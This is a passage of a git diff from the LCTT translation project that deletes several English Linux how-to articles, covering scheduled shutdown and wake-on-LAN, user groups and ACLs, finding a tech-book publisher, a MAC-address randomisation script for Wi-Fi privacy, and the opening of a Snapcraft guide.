will only send a visual notification. You can change this behavior by setting the variable UDM_PLAY_SOUND to a non-zero integer on the command line. However, your Ubuntu system should have pulseaudio-utils and sound-theme-freedesktop utilities installed to enable this functionality. - -Please remember that you need to run the following command to update the changes made. - -For Bash: - -``` -source ~/.bashrc -``` - -For Zsh: - -``` -source ~/.zshrc -``` - -It is time to verify if this really works. - -#### Get Notification When Long Running Terminal Commands Complete - -Now, run any command that takes longer than 10 seconds or the time duration you defined in Undistract-me script. - -I ran the following command on my Arch Linux desktop. - -``` -sudo pacman -Sy -``` - -This command took 32 seconds to complete. After the completion of the above command, I got the following notification. - - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] - -Please remember Undistract-me script notifies you only if the given command took more than 10 seconds to complete. If the command is completed in less than 10 seconds, you will not be notified. Of course, you can change this time interval settings as I described in the Configuration section above. - -I find this tool very useful. It helped me to get back to the business after I completely lost in some other tasks. I hope this tool will be helpful to you too. - -More good stuffs to come. Stay tuned! - -Cheers! - -Resource: - -* [Undistract-me GitHub Repository][1] - --------------------------------------------------------------------------------- - -via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal-commands-complete/ - -作者:[sk][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.ostechnix.com/author/sk/ -[1]:https://github.com/jml/undistract-me -[2]:https://www.ostechnix.com/author/sk/ -[3]:https://www.ostechnix.com/get-notification-terminal-task-done/ -[4]:https://www.ostechnix.com/install-pacaur-arch-linux/ -[5]:https://www.ostechnix.com/install-packer-arch-linux-2/ -[6]:https://www.ostechnix.com/install-yaourt-arch-linux/ -[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png -[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png diff --git a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md b/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md deleted file mode 100644 index 3a2c20ad52..0000000000 --- a/sources/tech/20171130 Wake up and Shut Down Linux Automatically.md +++ /dev/null @@ -1,135 +0,0 @@ - - translating by HardworkFish - -Wake up and Shut Down Linux Automatically -============================================================ - -### [banner.jpg][1] - -![time keeper](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner.jpg?itok=zItspoSb) - -Learn how to configure your Linux computers to watch the time for you, then wake up and shut down automatically. - -[Creative Commons Attribution][6][The Observatory at Delhi][7] - -Don't be a watt-waster. If your computers don't need to be on then shut them down. For convenience and nerd creds, you can configure your Linux computers to wake up and shut down automatically. - -### Precious Uptimes - -Some computers need to be on all the time, which is fine as long as it's not about satisfying an uptime compulsion. Some people are very proud of their lengthy uptimes, and now that we have kernel hot-patching that leaves only hardware failures requiring shutdowns. I think it's better to be practical. Save electricity as well as wear on your moving parts, and shut them down when they're not needed. For example, you can wake up a backup server at a scheduled time, run your backups, and then shut it down until it's time for the next backup. Or, you can configure your Internet gateway to be on only at certain times. Anything that doesn't need to be on all the time can be configured to turn on, do a job, and then shut down. - -### Sleepies - -For computers that don't need to be on all the time, good old cron will shut them down reliably. Use either root's cron, or /etc/crontab. This example creates a root cron job to shut down every night at 11:15 p.m. - -``` -# crontab -e -u root -# m h dom mon dow command -15 23 * * * /sbin/shutdown -h now -``` - -``` -15 23 * * 1-5 /sbin/shutdown -h now -``` - -You may also use /etc/crontab, which is fast and easy, and everything is in one file. You have to specify the user: - -``` -15 23 * * 1-5 root shutdown -h now -``` - -Auto-wakeups are very cool; most of my SUSE colleagues are in Nuremberg, so I am crawling out of bed at 5 a.m. to have a few hours of overlap with their schedules. My work computer turns itself on at 5:30 a.m., and then all I have to do is drag my coffee and myself to my desk to start work. It might not seem like pressing a power button is a big deal, but at that time of day every little thing looms large. - -Waking up your Linux PC can be less reliable than shutting it down, so you may want to try different methods. You can use wakeonlan, RTC wakeups, or your PC's BIOS to set scheduled wakeups. These all work because, when you power off your computer, it's not really all the way off; it is in an extremely low-power state and can receive and respond to signals. You need to use the power supply switch to turn it off completely. - -### BIOS Wakeup - -A BIOS wakeup is the most reliable. My system BIOS has an easy-to-use wakeup scheduler (Figure 1). Chances are yours does, too. Easy peasy. - -### [fig-1.png][2] - -![wake up](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-1_11.png?itok=8qAeqo1I) - -Figure 1: My system BIOS has an easy-to-use wakeup scheduler. - -[Used with permission][8] - -### wakeonlan - -wakeonlan is the next most reliable method. This requires sending a signal from a second computer to the computer you want to power on. You could use an Arduino or Raspberry Pi to send the wakeup signal, a Linux-based router, or any Linux PC. First, look in your system BIOS to see if wakeonlan is supported -- which it should be -- and then enable it, as it should be disabled by default. - -Then, you'll need an Ethernet network adapter that supports wakeonlan; wireless adapters won't work. You'll need to verify that your Ethernet card supports wakeonlan: - -``` -# ethtool eth0 | grep -i wake-on - Supports Wake-on: pumbg - Wake-on: g -``` - -* d -- all wake ups disabled - -* p -- wake up on physical activity - -* u -- wake up on unicast messages - -* m -- wake up on multicast messages - -* b -- wake up on broadcast messages - -* a -- wake up on ARP messages - -* g -- wake up on magic packet - -* s -- set the Secure On password for the magic packet - -man ethtool is not clear on what the p switch does; it suggests that any signal will cause a wake up. In my testing, however, it doesn't do that. The one that must be enabled is g -- wake up on magic packet, and the Wake-on line shows that it is already enabled. If it is not enabled, you can use ethtool to enable it, using your own device name, of course: - -``` -# ethtool -s eth0 wol g -``` - -``` -@reboot /usr/bin/ethtool -s eth0 wol g -``` - -### [fig-2.png][3] - -![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) - -Figure 2: Enable Wake on LAN. - -[Used with permission][9] - -Another option is recent Network Manager versions have a nice little checkbox to enable wakeonlan (Figure 2). - -There is a field for setting a password, but if your network interface doesn't support the Secure On password, it won't work. - -Now you need to configure a second PC to send the wakeup signal. You don't need root privileges, so create a cron job for your user. You need the MAC address of the network interface on the machine you're waking up: - -``` -30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B -``` - -Using the real-time clock for wakeups is the least reliable method. Check out [Wake Up Linux With an RTC Alarm Clock][4]; this is a bit outdated as most distros use systemd now. Come back next week to learn more about updated ways to use RTC wakeups. - -Learn more about Linux through the free ["Introduction to Linux" ][5]course from The Linux Foundation and edX. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically - -作者:[Carla Schroder] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/bannerjpg -[2]:https://www.linux.com/files/images/fig-1png-11 -[3]:https://www.linux.com/files/images/fig-2png-7 -[4]:https://www.linux.com/learn/wake-linux-rtc-alarm-clock -[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[6]:https://www.linux.com/licenses/category/creative-commons-attribution -[7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html -[8]:https://www.linux.com/licenses/category/used-permission -[9]:https://www.linux.com/licenses/category/used-permission diff --git a/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md b/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md deleted file mode 100644 index a74b196663..0000000000 --- a/sources/tech/20171201 Fedora Classroom Session: Ansible 101.md +++ /dev/null @@ -1,71 +0,0 @@ -### [Fedora Classroom Session: Ansible 101][2] - -### By Sachin S Kamath - -![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) - -Fedora Classroom sessions continue this week with an Ansible session. The general schedule for sessions appears [on the wiki][3]. You can also find [resources and recordings from previous sessions][4] there. Here are details about this week’s session on [Thursday, 30th November at 1600 UTC][5]. That link allows you to convert the time to your timezone. - -### Topic: Ansible 101 - -As the Ansible [documentation][6] explains, Ansible is an IT automation tool. It’s primarily used to configure systems, deploy software, and orchestrate more advanced IT tasks. Examples include continuous deployments or zero downtime rolling updates. - -This Classroom session covers the topics listed below: - -1. Introduction to SSH - -2. Understanding different terminologies - -3. Introduction to Ansible - -4. Ansible installation and setup - -5. Establishing password-less connection - -6. Ad-hoc commands - -7. Managing inventory - -8. Playbooks examples - -There will also be a follow-up Ansible 102 session later. That session will cover complex playbooks, roles, dynamic inventory files, control flow and Galaxy. - -### Instructors - -We have two experienced instructors handling this session. - -[Geoffrey Marr][7], also known by his IRC name as “coremodule,” is a Red Hat employee and Fedora contributor with a background in Linux and cloud technologies. While working, he spends his time lurking in the [Fedora QA][8] wiki and test pages. Away from work, he enjoys RaspberryPi projects, especially those focusing on software-defined radio. - -[Vipul Siddharth][9] is an intern at Red Hat who also works on Fedora. He loves to contribute to open source and seeks opportunities to spread the word of free and open source software. - -### Joining the session - -This session takes place on [BlueJeans][10]. The following information will help you join the session: - -* URL: [https://bluejeans.com/3466040121][1] - -* Meeting ID (for Desktop App): 3466040121 - -We hope you attend, learn from, and enjoy this session! If you have any feedback about the sessions, have ideas for a new one or want to host a session, please feel free to comment on this post or edit the [Classroom wiki page][11]. - --------------------------------------------------------------------------------- - -via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ - -作者:[Sachin S Kamath] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://bluejeans.com/3466040121 -[2]:https://fedoramagazine.org/fedora-classroom-session-ansible-101/ -[3]:https://fedoraproject.org/wiki/Classroom -[4]:https://fedoraproject.org/wiki/Classroom#Previous_Sessions -[5]:https://www.timeanddate.com/worldclock/fixedtime.html?msg=Fedora+Classroom+-+Ansible+101&iso=20171130T16&p1=%3A -[6]:http://docs.ansible.com/ansible/latest/index.html -[7]:https://fedoraproject.org/wiki/User:Coremodule -[8]:https://fedoraproject.org/wiki/QA -[9]:https://fedoraproject.org/wiki/User:Siddharthvipul1 -[10]:https://www.bluejeans.com/downloads -[11]:https://fedoraproject.org/wiki/Classroom diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md deleted file mode 100644 index 35350c819f..0000000000 --- a/sources/tech/20171201 How to Manage Users with Groups in Linux.md +++ /dev/null @@ -1,168 +0,0 @@ -translating---imquanquan - -How to Manage Users with Groups in Linux -============================================================ - -### [group-of-people-1645356_1920.jpg][1] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) - -Learn how to work with users, via groups and access control lists in this tutorial. - -[Creative Commons Zero][4] - -Pixabay - -When you administer a Linux machine that houses multiple users, there might be times when you need to take more control over those users than the basic user tools offer. This idea comes to the fore especially when you need to manage permissions for certain users. Say, for example, you have a directory that needs to be accessed with read/write permissions by one group of users and only read permissions for another group. With Linux, this is entirely possible. To make this happen, however, you must first understand how to work with users, via groups and access control lists (ACLs). - -We’ll start from the beginning with users and work our way to the more complex ACLs. Everything you need to make this happen will be included in your Linux distribution of choice. We won’t touch on the basics of users, as the focus on this article is about groups. - -For the purpose of this piece, I’m going to assume the following: - -You need to create two users with usernames: - -* olivia - -* nathan - -You need to create two groups: - -* readers - -* editors - -Olivia needs to be a member of the group editors, while nathan needs to be a member of the group readers. The group readers needs to only have read permission to the directory /DATA, whereas the group editors needs to have both read and write permission to the /DATA directory. This, of course, is very minimal, but it will give you the basic information you need to expand the tasks to fit your much larger needs. - -I’ll be demonstrating on the Ubuntu 16.04 Server platform. The commands will be universal—the only difference would be if your distribution of choice doesn’t make use of sudo. If this is the case, you’ll have to first su to the root user to issue the commands that require sudo in the demonstrations. - -### Creating the users - -The first thing we need to do is create the two users for our experiment. User creation is handled with the useradd command. Instead of just simply creating the users we need to create them both with their own home directories and then give them passwords. - -The first thing we do is create the users. To do this, issue the commands: - -``` -sudo useradd -m olivia - -sudo useradd -m nathan -``` - -Next each user must have a password. To add passwords into the mix, you’d issue the following commands: - -``` -sudo passwd olivia - -sudo passwd nathan -``` - -That’s it, your users are created. - -### Creating groups and adding users - -Now we’re going to create the groups readers and editors and then add users to them. The commands to create our groups are: - -``` -addgroup readers - -addgroup editors -``` - -### [groups_1.jpg][2] - -![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) - -Figure 1: Our new groups ready to be used. - -[Used with permission][5] - -With our groups created, we need to add our users. We’ll add user nathan to group readers with the command: - -``` -sudo usermod -a -G readers nathan -``` - -``` -sudo usermod -a -G editors olivia -``` - -### Giving groups permissions to directories - -Let’s say you have the directory /READERS and you need to allow all members of the readers group access to that directory. First, change the group of the folder with the command: - -``` -sudo chown -R :readers /READERS -``` - -``` -sudo chmod -R g-w /READERS -``` - -``` -sudo chmod -R o-x /READERS -``` - -Let’s say you have the directory /EDITORS and you need to give members of the editors group read and write permission to its contents. To do that, the following command would be necessary: - -``` -sudo chown -R :editors /EDITORS - -sudo chmod -R g+w /EDITORS - -sudo chmod -R o-x /EDITORS -``` - -The problem with using this method is you can only add one group to a directory at a time. This is where access control lists come in handy. - -### Using access control lists - -Now, let’s get tricky. Say you have a single folder—/DATA—and you want to give members of the readers group read permission and members of the group editors read/write permissions. To do that, you must take advantage of the setfacl command. The setfacl command sets file access control lists for files and folders. - -The structure of this command looks like this: - -``` -setfacl OPTION X:NAME:Y /DIRECTORY -``` - -``` -sudo setfacl -m g:readers:rx -R /DATA -``` - -To give members of the editors group read/write permissions (while retaining read permissions for the readers group), we’d issue the command; - -``` -sudo setfacl -m g:editors:rwx -R /DATA -``` - -### All the control you need - -And there you have it. You can now add members to groups and control those groups’ access to various directories with all the power and flexibility you need. To read more about the above tools, issue the commands: - -* man usradd - -* man addgroup - -* man usermod - -* man sefacl - -* man chown - -* man chmod - -Learn more about Linux through the free ["Introduction to Linux" ][3]course from The Linux Foundation and edX. - --------------------------------------------------------------------------------- - -via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux - -作者:[Jack Wallen ] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/group-people-16453561920jpg -[2]:https://www.linux.com/files/images/groups1jpg -[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[4]:https://www.linux.com/licenses/category/creative-commons-zero -[5]:https://www.linux.com/licenses/category/used-permission diff --git a/sources/tech/20171201 How to find a publisher for your tech book.md b/sources/tech/20171201 How to find a publisher for your tech book.md deleted file mode 100644 index 76dc8112ca..0000000000 --- a/sources/tech/20171201 How to find a publisher for your tech book.md +++ /dev/null @@ -1,76 +0,0 @@ -How to find a publisher for your tech book -============================================================ - -### Writing a technical book takes more than a good idea. You need to know a bit about how the publishing industry works. - - -![How to find a publisher for your tech book](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDUCATION_colorbooks.png?itok=vNhsYYyC "How to find a publisher for your tech book") -Image by : opensource.com - -You've got an idea for a technical book—congratulations! Like a hiking the Appalachian trail, or learning to cook a soufflé, writing a book is one of those things that people talk about, but never take beyond the idea stage. That makes sense, because the failure rate is pretty high. Making it real involves putting your idea in front of a publisher, and finding out whether it's good enough to become a book. That step is scary enough, but the lack of information about how to do it complicates matters. - -If you want to work with a traditional publisher, you'll need to get your book in front of them and hopefully start on the path to publication. I'm the Managing Editor at the [Pragmatic Bookshelf][4], so I see proposals all the time, as well as helping authors to craft good ones. Some are good, others are bad, but I often see proposals that just aren't right for Pragmatic. I'll help you with the process of finding the right publisher, and how to get your idea noticed. - -### Identify your target - -Your first step is to figure out which publisher is the a good fit for your idea. To start, think about the publishers that you buy books from, and that you enjoy. The odds are pretty good that your book will appeal to people like you, so starting with your favorites makes for a pretty good short list. If you don't have much of a book collection, you can visit a bookstore, or take a look on Amazon. Make a list of a handful of publishers that you personally like to start with. - -Next, winnow your prospects. Although most technical publishers look alike from a distance, they often have distinctive audiences. Some publishers go for broadly popular topics, such as C++ or Java. Your book on Elixir may not be a good fit for that publisher. If your prospective book is about teaching programming to kids, you probably don't want to go with the traditional academic publisher. - -Once you've identified a few targets, do some more research into the publishers' catalogs, either on their own site, or on Amazon. See what books they have that are similar to your idea. If they have a book that's identical, or nearly so, you'll have a tough time convincing them to sign yours. That doesn't necessarily mean you should drop that publisher from your list. You can make some changes to your proposal to differentiate it from the existing book: target a different audience, or a different skill level. Maybe the existing book is outdated, and you could focus on new approaches to the technology. Make your proposal into a book that complements the existing one, rather than competes. - -If your target publisher has no books that are similar, that can be a good sign, or a very bad one. Sometimes publishers choose not to publish on specific technologies, either because they don't believe their audience is interested, or they've had trouble with that technology in the past. New languages and libraries pop up all the time, and publishers have to make informed guesses about which will appeal to their readers. Their assessment may not be the same as yours. Their decision might be final, or they might be waiting for the right proposal. The only way to know is to propose and find out. - -### Work your network - -Identifying a publisher is the first step; now you need to make contact. Unfortunately, publishing is still about  _who_  you know, more than  _what_  you know. The person you want to know is an  _acquisitions editor,_  the editor whose job is to find new markets, authors, and proposals. If you know someone who has connections with a publisher, ask for an introduction to an acquisitions editor. These editors often specialize in particular subject areas, particularly at larger publishers, but you don't need to find the right one yourself. They're usually happy to connect you with the correct person. - -Sometimes you can find an acquisitions editor at a technical conference, especially one where the publisher is a sponsor, and has a booth. Even if there's not an acquisitions editor on site at the time, the staff at the booth can put you in touch with one. If conferences aren't your thing, you'll need to work your network to get an introduction. Use LinkedIn, or your informal contacts, to get in touch with an editor. - -For smaller publishers, you may find acquisitions editors listed on the company website, with contact information if you're lucky. If not, search for the publisher's name on Twitter, and see if you can turn up their editors. You might be nervous about trying to reach out to a stranger over social media to show them your book, but don't worry about it. Making contact is what acquisitions editors do. The worst-case result is they ignore you. - -Once you've made contact, the acquisitions editor will assist you with the next steps. They may have some feedback on your proposal right away, or they may want you to flesh it out according to their guidelines before they'll consider it. After you've put in the effort to find an acquisitions editor, listen to their advice. They know their system better than you do. - -### If all else fails - -If you can't find an acquisitions editor to contact, the publisher almost certainly has a blind proposal alias, usually of the form `proposals@[publisher].com`. Check the web site for instructions on what to send to a proposal alias; some publishers have specific requirements. Follow these instructions. If you don't, you have a good chance of your proposal getting thrown out before anybody looks at it. If you have questions, or aren't sure what the publisher wants, you'll need to try again to find an editor to talk to, because the proposal alias is not the place to get questions answered. Put together what they've asked for (which is a topic for a separate article), send it in, and hope for the best. - -### And ... wait - -No matter how you've gotten in touch with a publisher, you'll probably have to wait. If you submitted to the proposals alias, it's going to take a while before somebody does anything with that proposal, especially at a larger company. Even if you've found an acquisitions editor to work with, you're probably one of many prospects she's working with simultaneously, so you might not get rapid responses. Almost all publishers have a committee that decides on which proposals to accept, so even if your proposal is awesome and ready to go, you'll still need to wait for the committee to meet and discuss it. You might be waiting several weeks, or even a month before you hear anything. - -After a couple of weeks, it's fine to check back in with the editor to see if they need any more information. You want to be polite in this e-mail; if they haven't answered because they're swamped with proposals, being pushy isn't going to get you to the front of the line. It's possible that some publishers will never respond at all instead of sending a rejection notice, but that's uncommon. There's not a lot to do at this point other than be patient. Of course, if it's been months and nobody's returning your e-mails, you're free to approach a different publisher or consider self-publishing. - -### Good luck - -If this process seems somewhat scattered and unscientific, you're right; it is. Getting published depends on being in the right place, at the right time, talking to the right person, and hoping they're in the right mood. You can't control all of those variables, but having a better knowledge of how the industry works, and what publishers are looking for, can help you optimize the ones you can control. - -Finding a publisher is one step in a lengthy process. You need to refine your idea and create the proposal, as well as other considerations. At SeaGL this year [I presented][5] an introduction to the entire process. Check out [the video][6] for more detailed information. - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/portrait.jpg?itok=b77dlNC4)][7] - - Brian MacDonald - Brian MacDonald is Managing Editor at the Pragmatic Bookshelf. Over the last 20 years in tech publishing, he's been an editor, author, and occasional speaker and trainer. He currently spends a lot of his time talking to new authors about how they can best present their ideas. You can follow him on Twitter at @bmac_editor.[More about me][2] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/12/how-find-publisher-your-book - -作者:[Brian MacDonald ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/bmacdonald -[1]:https://opensource.com/article/17/12/how-find-publisher-your-book?rate=o42yhdS44MUaykAIRLB3O24FvfWxAxBKa5WAWSnSY0s -[2]:https://opensource.com/users/bmacdonald -[3]:https://opensource.com/user/190176/feed -[4]:https://pragprog.com/ -[5]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook -[6]:https://archive.org/details/SeaGL2017WritingTheNextGreatTechBook -[7]:https://opensource.com/users/bmacdonald -[8]:https://opensource.com/users/bmacdonald -[9]:https://opensource.com/users/bmacdonald -[10]:https://opensource.com/article/17/12/how-find-publisher-your-book#comments diff --git a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md b/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md deleted file mode 100644 index b0f8e72018..0000000000 --- a/sources/tech/20171201 Randomize your WiFi MAC address on Ubuntu 16.04.md +++ /dev/null @@ -1,160 +0,0 @@ -Randomize your WiFi MAC address on Ubuntu 16.04 -============================================================ - - _Your device’s MAC address can be used to track you across the WiFi networks you connect to. That data can be shared and sold, and often identifies you as an individual. It’s possible to limit this tracking by using pseudo-random MAC addresses._ - -![A captive portal screen for a hotel allowing you to log in with social media for an hour of free WiFi](https://www.paulfurley.com/img/captive-portal-our-hotel.gif) - - _Image courtesy of [Cloudessa][4]_ - -Every network device like a WiFi or Ethernet card has a unique identifier called a MAC address, for example `b4:b6:76:31:8c:ff`. It’s how networking works: any time you connect to a WiFi network, the router uses that address to send and receive packets to your machine and distinguish it from other devices in the area. - -The snag with this design is that your unique, unchanging MAC address is just perfect for tracking you. Logged into Starbucks WiFi? Noted. London Underground? Logged. - -If you’ve ever put your real name into one of those Craptive Portals on a WiFi network you’ve now tied your identity to that MAC address. Didn’t read the terms and conditions? You might assume that free airport WiFi is subsidised by flogging ‘customer analytics’ (your personal information) to hotels, restaurant chains and whomever else wants to know about you. - -I don’t subscribe to being tracked and sold by mega-corps, so I spent a few hours hacking a solution. - -### MAC addresses don’t need to stay the same - -Fortunately, it’s possible to spoof your MAC address to a random one without fundamentally breaking networking. - -I wanted to randomize my MAC address, but with three particular caveats: - -1. The MAC should be different across different networks. This means Starbucks WiFi sees a different MAC from London Underground, preventing linking my identity across different providers. - -2. The MAC should change regularly to prevent a network knowing that I’m the same person who walked past 75 times over the last year. - -3. The MAC stays the same throughout each working day. When the MAC address changes, most networks will kick you off, and those with Craptive Portals will usually make you sign in again - annoying. - -### Manipulating NetworkManager - -My first attempt of using the `macchanger` tool was unsuccessful as NetworkManager would override the MAC address according to its own configuration. - -I learned that NetworkManager 1.4.1+ can do MAC address randomization right out the box. If you’re using Ubuntu 17.04 upwards, you can get most of the way with [this config file][7]. You can’t quite achieve all three of my requirements (you must choose  _random_ or  _stable_  but it seems you can’t do  _stable-for-one-day_ ). - -Since I’m sticking with Ubuntu 16.04 which ships with NetworkManager 1.2, I couldn’t make use of the new functionality. Supposedly there is some randomization support but I failed to actually make it work, so I scripted up a solution instead. - -Fortunately NetworkManager 1.2 does allow for spoofing your MAC address. You can see this in the ‘Edit connections’ dialog for a given network: - -![Screenshot of NetworkManager's edit connection dialog, showing a text entry for a cloned mac address](https://www.paulfurley.com/img/network-manager-cloned-mac-address.png) - -NetworkManager also supports hooks - any script placed in `/etc/NetworkManager/dispatcher.d/pre-up.d/` is run before a connection is brought up. - -### Assigning pseudo-random MAC addresses - -To recap, I wanted to generate random MAC addresses based on the  _network_  and the  _date_ . We can use the NetworkManager command line, nmcli, to show a full list of networks: - -``` -> nmcli connection -NAME UUID TYPE DEVICE -Gladstone Guest 618545ca-d81a-11e7-a2a4-271245e11a45 802-11-wireless wlp1s0 -DoESDinky 6e47c080-d81a-11e7-9921-87bc56777256 802-11-wireless -- -PublicWiFi 79282c10-d81a-11e7-87cb-6341829c2a54 802-11-wireless -- -virgintrainswifi 7d0c57de-d81a-11e7-9bae-5be89b161d22 802-11-wireless -- - -``` - -Since each network has a unique identifier, to achieve my scheme I just concatenated the UUID with today’s date and hashed the result: - -``` - -# eg 618545ca-d81a-11e7-a2a4-271245e11a45-2017-12-03 - -> echo -n "${UUID}-$(date +%F)" | md5sum - -53594de990e92f9b914a723208f22b3f - - -``` - -That produced bytes which can be substituted in for the last octets of the MAC address. - -Note that the first byte `02` signifies the address is [locally administered][8]. Real, burned-in MAC addresses start with 3 bytes designing their manufacturer, for example `b4:b6:76` for Intel. - -It’s possible that some routers may reject locally administered MACs but I haven’t encountered that yet. - -On every connection up, the script calls `nmcli` to set the spoofed MAC address for every connection: - -![A terminal window show a number of nmcli command line calls](https://www.paulfurley.com/img/terminal-window-nmcli-commands.png) - -As a final check, if I look at `ifconfig` I can see that the `HWaddr` is the spoofed one, not my real MAC address: - -``` -> ifconfig -wlp1s0 Link encap:Ethernet HWaddr b4:b6:76:45:64:4d - inet addr:192.168.0.86 Bcast:192.168.0.255 Mask:255.255.255.0 - inet6 addr: fe80::648c:aff2:9a9d:764/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:12107812 errors:0 dropped:2 overruns:0 frame:0 - TX packets:18332141 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:11627977017 (11.6 GB) TX bytes:20700627733 (20.7 GB) - -``` - -The full script is [available on Github][9]. - -``` -#!/bin/sh - -# /etc/NetworkManager/dispatcher.d/pre-up.d/randomize-mac-addresses - -# Configure every saved WiFi connection in NetworkManager with a spoofed MAC -# address, seeded from the UUID of the connection and the date eg: -# 'c31bbcc4-d6ad-11e7-9a5a-e7e1491a7e20-2017-11-20' - -# This makes your MAC impossible(?) to track across WiFi providers, and -# for one provider to track across days. - -# For craptive portals that authenticate based on MAC, you might want to -# automate logging in :) - -# Note that NetworkManager >= 1.4.1 (Ubuntu 17.04+) can do something similar -# automatically. - -export PATH=$PATH:/usr/bin:/bin - -LOG_FILE=/var/log/randomize-mac-addresses - -echo "$(date): $*" > ${LOG_FILE} - -WIFI_UUIDS=$(nmcli --fields type,uuid connection show |grep 802-11-wireless |cut '-d ' -f3) - -for UUID in ${WIFI_UUIDS} -do - UUID_DAILY_HASH=$(echo "${UUID}-$(date +F)" | md5sum) - - RANDOM_MAC="02:$(echo -n ${UUID_DAILY_HASH} | sed 's/^\(..\)\(..\)\(..\)\(..\)\(..\).*$/\1:\2:\3:\4:\5/')" - - CMD="nmcli connection modify ${UUID} wifi.cloned-mac-address ${RANDOM_MAC}" - - echo "$CMD" >> ${LOG_FILE} - $CMD & -done - -wait -``` -Enjoy! - - _Update: [Use locally administered MAC addresses][5] to avoid clashing with real Intel ones. Thanks [@_fink][6]_ - --------------------------------------------------------------------------------- - -via: https://www.paulfurley.com/randomize-your-wifi-mac-address-on-ubuntu-1604-xenial/ - -作者:[Paul M Furley ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.paulfurley.com/ -[1]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/raw/5f02fc8f6ff7fca5bca6ee4913c63bf6de15abca/randomize-mac-addresses -[2]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f#file-randomize-mac-addresses -[3]:https://github.com/ -[4]:http://cloudessa.com/products/cloudessa-aaa-and-captive-portal-cloud-service/ -[5]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f/revisions#diff-824d510864d58c07df01102a8f53faef -[6]:https://twitter.com/fink_/status/937305600005943296 -[7]:https://gist.github.com/paulfurley/978d4e2e0cceb41d67d017a668106c53/ -[8]:https://en.wikipedia.org/wiki/MAC_address#Universal_vs._local -[9]:https://gist.github.com/paulfurley/46e0547ce5c5ea7eabeaef50dbacef3f diff --git a/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md b/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md deleted file mode 100644 index dbdebf63e3..0000000000 --- a/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md +++ /dev/null @@ -1,321 +0,0 @@ -Python -============================================================ - -Python has rich tools for packaging, distributing and sandboxing applications. Snapcraft builds on top of these familiar tools such as `pip`, `setup.py` and `requirements.txt` to create snaps for people to install on Linux. - -### What problems do snaps solve for Python applications? - -Linux install instructions for Python applications often get complicated. System dependencies, which differ from distribution to distribution, must be separately installed. To prevent modules from different Python applications clashing with each other, developer tools like `virtualenv` or `venv` must be used. With snapcraft it’s one command to produce a bundle that works anywhere. - -Here are some snap advantages that will benefit many Python projects: - -* Bundle all the runtime requirements, including the exact versions of system libraries and the Python interpreter. - -* Simplify installation instructions, regardless of distribution, to `snap install mypythonapp`. - -* Directly control the delivery of automatic application updates. - -* Extremely simple creation of daemons. - -### Getting started - -Let’s take a look at offlineimap and youtube-dl by way of examples. Both are command line applications. offlineimap uses Python 2 and only has 